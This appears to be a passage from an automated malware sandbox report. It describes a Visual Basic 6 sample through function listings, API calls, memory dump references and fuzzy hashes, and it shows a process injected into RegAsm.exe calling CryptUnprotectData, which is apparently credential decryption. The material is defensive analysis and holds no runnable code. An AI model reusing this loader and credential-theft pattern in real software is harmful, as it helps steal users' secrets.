                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: ca3c2f828527c93d0a274c12d78efcb19d9d7ee169cc869cceb52b52f0d30dc4
                                                            • Instruction ID: ca60bf667bde249a49c67ce92521e70835b100b53275641ccbc4fea69ff6f64b
                                                            • Opcode Fuzzy Hash: ca3c2f828527c93d0a274c12d78efcb19d9d7ee169cc869cceb52b52f0d30dc4
                                                            • Instruction Fuzzy Hash: 8A916E22B1A3000B875D98BE54D0967C4D79FEF21036AE63D252EF73A5EDB9CD4B0148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004034E9, Relevance: 1.6, APIs: 1, Instructions: 388memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 7ede328ab0ec126590218beb005289e7bd4ec3e19dfa3d6ed61884137141f51a
                                                            • Instruction ID: 510d337d02c4bfd2ce6dd59b4af41f4a50aeba46a52c1b7546882d871db36cec
                                                            • Opcode Fuzzy Hash: 7ede328ab0ec126590218beb005289e7bd4ec3e19dfa3d6ed61884137141f51a
                                                            • Instruction Fuzzy Hash: 69816C22B1A3000B875D98BE54D096BC4D79FEF220369E63D212EF73A5EDB9CD4B1148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040356C, Relevance: 1.6, APIs: 1, Instructions: 379memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 7364021d0aa2671a17ffb59cc0707e425f07014f61c7fd0bef58a9d3908efca6
                                                            • Instruction ID: 8569b6c073b8bba72e7082788c9bd5f3690bec4eabca2cf89a1996decc2de789
                                                            • Opcode Fuzzy Hash: 7364021d0aa2671a17ffb59cc0707e425f07014f61c7fd0bef58a9d3908efca6
                                                            • Instruction Fuzzy Hash: FC714962B1A3000B875D98BE44D096BC0D79FEF221239E63D252EF73A5EDB9CD4B1148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004035EB, Relevance: 1.6, APIs: 1, Instructions: 378memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: df6951d5d062c140b7158a71f25c71dec64afe6530e6cbb5848b874994b28e97
                                                            • Instruction ID: dd10da7d7e3c58a7373ca48ca1164f12caf529166207cb649d14b871208dcc36
                                                            • Opcode Fuzzy Hash: df6951d5d062c140b7158a71f25c71dec64afe6530e6cbb5848b874994b28e97
                                                            • Instruction Fuzzy Hash: 54616962B1A3000B875D98BE44D0967C1D79FEE221339E63D212EF7369EDB9CD4B1148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004036FC, Relevance: 1.6, APIs: 1, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 40911a79f36e5b018df3a0bf9805a132ba10e43f39a4964d960236b44c6c0807
                                                            • Instruction ID: e51f0ebe2146c050d909f9d5e7f9a2845b1927d6f283d1d2209da5cc1b960338
                                                            • Opcode Fuzzy Hash: 40911a79f36e5b018df3a0bf9805a132ba10e43f39a4964d960236b44c6c0807
                                                            • Instruction Fuzzy Hash: CB516B22B193000B875998BE54D0967C1D79FEE221339E63E612DF7369EDB9CD4B1248
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040367A, Relevance: 1.6, APIs: 1, Instructions: 302memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: b2a42d7563bfa8d08770e4d6d030fc7e40eef13de928b3f23fdcff57c9fac031
                                                            • Instruction ID: ff8ba58bd82e97b74632633b80547a4f43bb23241b776fe9ce1ce3e3b7a1686a
                                                            • Opcode Fuzzy Hash: b2a42d7563bfa8d08770e4d6d030fc7e40eef13de928b3f23fdcff57c9fac031
                                                            • Instruction Fuzzy Hash: 84514A62B1A3000B875D98BE44D0967C1D79FEE211339E639612DF7369EDB9CD4B1248
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040378A, Relevance: 1.5, APIs: 1, Instructions: 253memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: be5d7d4152f60dba316b51c36d580df02cc07bad9680fb28b2be02e177584ea8
                                                            • Instruction ID: 29fc0eaf663b31317c57603ba904c3c3d3b9b48b1eb89b8e89f375a994d26cac
                                                            • Opcode Fuzzy Hash: be5d7d4152f60dba316b51c36d580df02cc07bad9680fb28b2be02e177584ea8
                                                            • Instruction Fuzzy Hash: CA417C62B1A3000B875D987E44D096BC1D79FEE211339E63D252EF73A9EDB9CD4B1248
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0041A79B, Relevance: 52.7, APIs: 28, Strings: 2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __vbaStrCopy.MSVBVM60 ref: 0041A7ED
                                                            • __vbaVarDup.MSVBVM60 ref: 0041A802
                                                            • #562.MSVBVM60(?), ref: 0041A80B
                                                            • __vbaFreeVar.MSVBVM60(?), ref: 0041A821
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380,?), ref: 0041A841
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041A866
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,00000138), ref: 0041A89B
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,00412258,00000138), ref: 0041A8A3
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380), ref: 0041A8BB
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041A8DB
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,00000138), ref: 0041A906
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,00412258,00000138), ref: 0041A90E
                                                            • #705.MSVBVM60(?,00000000), ref: 0041A923
                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A92D
                                                            • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041A935
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380,?,00000000), ref: 0041A94D
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,0000001C), ref: 0041A96D
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041228C,00000050), ref: 0041A98C
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,0041228C,00000050), ref: 0041A994
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380,?), ref: 0041A9B4
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041A9D4
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,00000068), ref: 0041A9F7
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,00412258,00000068), ref: 0041A9FF
                                                            • #611.MSVBVM60(00000000,?,00412258,00000068), ref: 0041AA04
                                                            • __vbaStrMove.MSVBVM60(00000000,?,00412258,00000068), ref: 0041AA0E
                                                            • __vbaFreeStr.MSVBVM60(0041AA44), ref: 0041AA2E
                                                            • __vbaFreeStr.MSVBVM60(0041AA44), ref: 0041AA36
                                                            • __vbaFreeStr.MSVBVM60(0041AA44), ref: 0041AA3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$Free$CheckHresult$New2$Move$#562#611#705Copy
                                                            • String ID: Inferencing$Sprinkelvrkernes
                                                            • API String ID: 3821766861-2317132577
                                                            • Opcode ID: 9eb1199f3600cac18aec4297ca2f8f58bb30d47982a8802b15f982fa693d465c
                                                            • Instruction ID: 97e6c8e769a8d01473292366154acbffbb6debe31e538cd6577a180fb1a387d7
                                                            • Opcode Fuzzy Hash: 9eb1199f3600cac18aec4297ca2f8f58bb30d47982a8802b15f982fa693d465c
                                                            • Instruction Fuzzy Hash: 38716271940208ABCB10EFA5CC85EDEBBB8AF15704F54813EF501B71E1DBB85986CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A533, Relevance: 31.7, APIs: 21, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • #585.MSVBVM60 ref: 0041A585
                                                            • __vbaFpR8.MSVBVM60 ref: 0041A58A
                                                            • #705.MSVBVM60(?,00000000), ref: 0041A5B1
                                                            • __vbaStrMove.MSVBVM60(?,00000000), ref: 0041A5BB
                                                            • __vbaFreeVar.MSVBVM60(?,00000000), ref: 0041A5C3
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380,?,00000000), ref: 0041A5DA
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041A5FE
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,000000D0), ref: 0041A627
                                                            • __vbaStrMove.MSVBVM60(00000000,?,00412258,000000D0), ref: 0041A635
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,00412258,000000D0), ref: 0041A63D
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380), ref: 0041A654
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041A678
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,000000B8), ref: 0041A6A4
                                                            • __vbaFreeObj.MSVBVM60(00000000,?,00412258,000000B8), ref: 0041A6AC
                                                            • #685.MSVBVM60(00000000,?,00412258,000000B8), ref: 0041A6B1
                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041A6BB
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00414340,00000044), ref: 0041A70C
                                                            • __vbaFreeObj.MSVBVM60(00000000,00000000,00414340,00000044), ref: 0041A714
                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,?,?,?), ref: 0041A72B
                                                            • __vbaFreeStr.MSVBVM60(0041A780), ref: 0041A772
                                                            • __vbaFreeStr.MSVBVM60(0041A780), ref: 0041A77A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$Free$CheckHresult$MoveNew2$#585#685#705List
                                                            • String ID:
                                                            • API String ID: 1883905597-0
                                                            • Opcode ID: 79e3aafdaeaf44ad6459a9264804fc967bad504da76fa78af6c4174e6a93f8f7
                                                            • Instruction ID: 837aac7822a733cc90fa25398be43dfb3b085a24de5c1e880272f31d61fc8f45
                                                            • Opcode Fuzzy Hash: 79e3aafdaeaf44ad6459a9264804fc967bad504da76fa78af6c4174e6a93f8f7
                                                            • Instruction Fuzzy Hash: 7B514BB1940208ABDB04EFA5CC86EDEBBB8EF54704F14412BF105B71A1DBB85985CB69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041A378, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __vbaChkstk.MSVBVM60(?,00401676), ref: 0041A396
                                                            • __vbaI4Str.MSVBVM60(00414320,?,?,?,?,00401676), ref: 0041A3D4
                                                            • #704.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A400
                                                            • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A40A
                                                            • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A412
                                                            • __vbaOnError.MSVBVM60(00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A420
                                                            • #706.MSVBVM60(00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A432
                                                            • __vbaStrMove.MSVBVM60(00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A43C
                                                            • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,00000001,00000000,00000000,00000000,00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041A486
                                                            • #595.MSVBVM60(00000002,00000000,0000000A,0000000A,0000000A,?,?,?,?,?,?,?,00000001,00000000,00000000,00000000), ref: 0041A49D
                                                            • __vbaFreeVarList.MSVBVM60(00000004,00000002,0000000A,0000000A,0000000A,00000002,00000000,0000000A,0000000A,0000000A), ref: 0041A4B4
                                                            • __vbaOnError.MSVBVM60(000000FF,00414320,?,?,?,?,00401676), ref: 0041A4C5
                                                            • __vbaFreeStr.MSVBVM60(0041A50A,000000FF,00414320), ref: 0041A4FC
                                                            • __vbaFreeStr.MSVBVM60(0041A50A,000000FF,00414320), ref: 0041A504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$Free$ErrorMove$#595#704#706ChkstkList
                                                            • String ID: Gregarinian
                                                            • API String ID: 2605556234-529014253
                                                            • Opcode ID: ca45c3a6460d218ac1fab697def382e5bae825cb68080c72869f1fb71cd0fe18
                                                            • Instruction ID: 71a7e8d4b65aed4db87b11b8219fe15765a2a6008bc3bd7ebcce297b223d887d
                                                            • Opcode Fuzzy Hash: ca45c3a6460d218ac1fab697def382e5bae825cb68080c72869f1fb71cd0fe18
                                                            • Instruction Fuzzy Hash: 5C41EBB1D0120CABDB10EFD5C945BDDBBB9AF04314F60812AF1217B2E1DBB95A09CB59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041AA61, Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __vbaNew2.MSVBVM60(00412248,0041C380), ref: 0041AAA3
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,02D0E8DC,00412238,00000014), ref: 0041AAC7
                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00412258,000000C8), ref: 0041AAF0
                                                            • __vbaFreeObj.MSVBVM60 ref: 0041AAF8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: __vba$CheckHresult$FreeNew2
                                                            • String ID:
                                                            • API String ID: 4261391273-0
                                                            • Opcode ID: 851e5315a04c718cd2114c9c28fad8983810ba94b82a201d4edce0d681f96dbc
                                                            • Instruction ID: 801d8f2a3e793767b972440121879a014339239af97c89889dc3acd6bdb57f53
                                                            • Opcode Fuzzy Hash: 851e5315a04c718cd2114c9c28fad8983810ba94b82a201d4edce0d681f96dbc
                                                            • Instruction Fuzzy Hash: C711A371981205BBD700DB55CD46EEFBBB9EF54B44F10822AF100B31E0D7B86881CBA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: RegAsm.exe PID: 2588 Parent PID: 8804 RegAsm.exeCOMMON

                                                            Executed Functions

                                                            Function 00A4714C, Relevance: 2.5, APIs: 1, Instructions: 964libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: dacb01e402a03ec53549cce5785528f0ff8e3ca3610cc26b8fa073d40aa7b42a
                                                            • Instruction ID: c9fe97b1e3a2bf11d3f4f1643d51cb8913c01221382ea2005201f59456184812
                                                            • Opcode Fuzzy Hash: dacb01e402a03ec53549cce5785528f0ff8e3ca3610cc26b8fa073d40aa7b42a
                                                            • Instruction Fuzzy Hash: D5A2E978A09228CFCB64DF70C8887ADB7B6BF88305F2045E9D50AA7245DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DA5D58, Relevance: 2.0, APIs: 1, Instructions: 495COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5637894406.0000000000DA0000.00000040.00000010.sdmp, Offset: 00DA0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8188885ec813472bc6a5e38a18eab5200051d48d704c63f2794e49327d5ac7d0
                                                            • Instruction ID: 292dc1cdad1a1e52aee152f9427a4cb3adb7f6a0e71b25a137100e382ee0cb7c
                                                            • Opcode Fuzzy Hash: 8188885ec813472bc6a5e38a18eab5200051d48d704c63f2794e49327d5ac7d0
                                                            • Instruction Fuzzy Hash: 0102F434B042049FDB04EBB4C898BAE7BB6AF85344F188869E506DB296DF35EC45C771
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DAF540, Relevance: 1.6, APIs: 1, Instructions: 55encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00DAFC9D
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5637894406.0000000000DA0000.00000040.00000010.sdmp, Offset: 00DA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID:
                                                            • API String ID: 834300711-0
                                                            • Opcode ID: 2c081614ce7f057db0b8091a8fbe2885236a7bb02683387c7235ca5ffdc7545d
                                                            • Instruction ID: bd688e2970ac67b194c53f10a490606fdbbb98a039189478ba112a2441cf7349
                                                            • Opcode Fuzzy Hash: 2c081614ce7f057db0b8091a8fbe2885236a7bb02683387c7235ca5ffdc7545d
                                                            • Instruction Fuzzy Hash: A1115676800209DFCB10CF9AC944BEEBFF4EF49320F148469E954A7251C378A954DFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DAFC31, Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 00DAFC9D
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5637894406.0000000000DA0000.00000040.00000010.sdmp, Offset: 00DA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CryptDataUnprotect
                                                            • String ID:
                                                            • API String ID: 834300711-0
                                                            • Opcode ID: 127e654b87efe6aa19eaca1f6792e949ba5d99f4c7cdd7c470158fa6534b5685
                                                            • Instruction ID: a44436ca0c908699c62734d26fff1c46e8019c47a767261ba1c328fe6c62a140
                                                            • Opcode Fuzzy Hash: 127e654b87efe6aa19eaca1f6792e949ba5d99f4c7cdd7c470158fa6534b5685
                                                            • Instruction Fuzzy Hash: 33116776800209DFCB10CF99C944BEEBFF4EF48320F14841AE914A7650C335A554DFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DBB216, Relevance: .7, Instructions: 659COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2b8e753d81aedcda77fa942e4142242b83b3da39e8ea43b9ed39f7970ccb4c7a
                                                            • Instruction ID: e1a28dd45fb397188d61ddc2db1fc2034c43129bda3e1dfd97a901ebd63634ae
                                                            • Opcode Fuzzy Hash: 2b8e753d81aedcda77fa942e4142242b83b3da39e8ea43b9ed39f7970ccb4c7a
                                                            • Instruction Fuzzy Hash: 9742B130E04244CFDB24DFB4C4547ADBBA2AF85314F69856ED50A9F29ACBB0DC44CB62
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DBDC3D, Relevance: .3, Instructions: 331COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5638258904.0000000000DB0000.00000040.00000010.sdmp, Offset: 00DB0000, based on PE: false
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4c1bf90adf17a3f4a4db64824ca610105eb6b9837d49e56b9bd0c07f4aff43f
                                                            • Instruction ID: 918bff1e99c28a2678dcf4db5cba222a27a55d40578900a736ea80ed0f95a2dc
                                                            • Opcode Fuzzy Hash: b4c1bf90adf17a3f4a4db64824ca610105eb6b9837d49e56b9bd0c07f4aff43f
                                                            • Instruction Fuzzy Hash: 0FC1D230A042548FDB249BB4C8547FE7BE3AF89304F598869D44B9B399DF709C45CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA2D5, Relevance: 6.2, APIs: 4, Instructions: 160threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 1D9EA386
                                                            • GetCurrentThread.KERNEL32 ref: 1D9EA3C3
                                                            • GetCurrentProcess.KERNEL32 ref: 1D9EA400
                                                            • GetCurrentThreadId.KERNEL32 ref: 1D9EA459
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 1705849d8b41d6f6c76f70dc8145b03fd88b008ba8cf047f93d701715b948bbc
                                                            • Instruction ID: 12c8e6135464f031b9cb1c219e9237cff2d06b1987a4227f93afecdc8fe6caef
                                                            • Opcode Fuzzy Hash: 1705849d8b41d6f6c76f70dc8145b03fd88b008ba8cf047f93d701715b948bbc
                                                            • Instruction Fuzzy Hash: 22619BB0904388CFDB02DFA9C4447EEBFF4AF4A314F14849ED049AB2A2D7355848CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1D9EA308, Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 1D9EA386
                                                            • GetCurrentThread.KERNEL32 ref: 1D9EA3C3
                                                            • GetCurrentProcess.KERNEL32 ref: 1D9EA400
                                                            • GetCurrentThreadId.KERNEL32 ref: 1D9EA459
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5657217630.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 95c02b026a146a4bae8d7ac1463ac8e77ede6aea6fab7ac2bdd29e1fb6b04b8c
                                                            • Instruction ID: 44579acd560cdbbd19585aadedf16f8691ad5bf149549434f22c841de9f294ee
                                                            • Opcode Fuzzy Hash: 95c02b026a146a4bae8d7ac1463ac8e77ede6aea6fab7ac2bdd29e1fb6b04b8c
                                                            • Instruction Fuzzy Hash: 505159B0900649CFDB01DFA9C548BAEBFF5AF88314F20885DD409AB361D7756944CF66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A4716D, Relevance: 2.1, APIs: 1, Instructions: 637libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a974947c2cc14fbd6af6e166fb785036a71c795b42d9df24ad7814ee404d4f70
                                                            • Instruction ID: ba7ec9b53d20c13d203094f0e41dc450fde18a53ab8e033c169eaeee7475e982
                                                            • Opcode Fuzzy Hash: a974947c2cc14fbd6af6e166fb785036a71c795b42d9df24ad7814ee404d4f70
                                                            • Instruction Fuzzy Hash: 4F620D78A09228CFCB64DF70C88869DB7B5BF88305F6085E9D50AA7344DB359E85CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00A471B4, Relevance: 2.1, APIs: 1, Instructions: 628libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000019.00000002.5634997276.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b4fa2d3c88604fa0fc53a482a40e697fa7e2e8c02514ed9b37db69c24c08de63
                                                            • Instruction ID: 298c12c8dbf3a9845bdc390e43f3a2b14ae96b6d70b505719c545534ccd9b163
                                                            • Opcode Fuzzy Hash: b4fa2d3c88604fa0fc53a482a40e697fa7e2e8c02514ed9b37db69c24c08de63
